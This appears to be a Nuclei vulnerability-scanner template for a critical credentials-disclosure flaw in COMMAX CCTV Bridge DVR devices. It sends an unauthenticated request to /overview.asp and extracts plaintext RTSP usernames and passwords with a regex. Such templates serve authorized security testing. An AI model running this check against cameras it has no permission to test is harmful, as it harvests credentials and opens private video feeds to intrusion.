id: commax-credentials-disclosure info: name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure author: gy741 severity: critical description: | The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php tags: commax,exposure,camera,iot requests: - method: GET path: - "{{BaseURL}}/overview.asp" matchers: - type: word part: body words: - "DVR Lists" - "rtsp://" - "login_check.js" - "MAX USER :" condition: and extractors: - type: regex part: body regex: - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann' # Enhanced by mp on 2022/05/27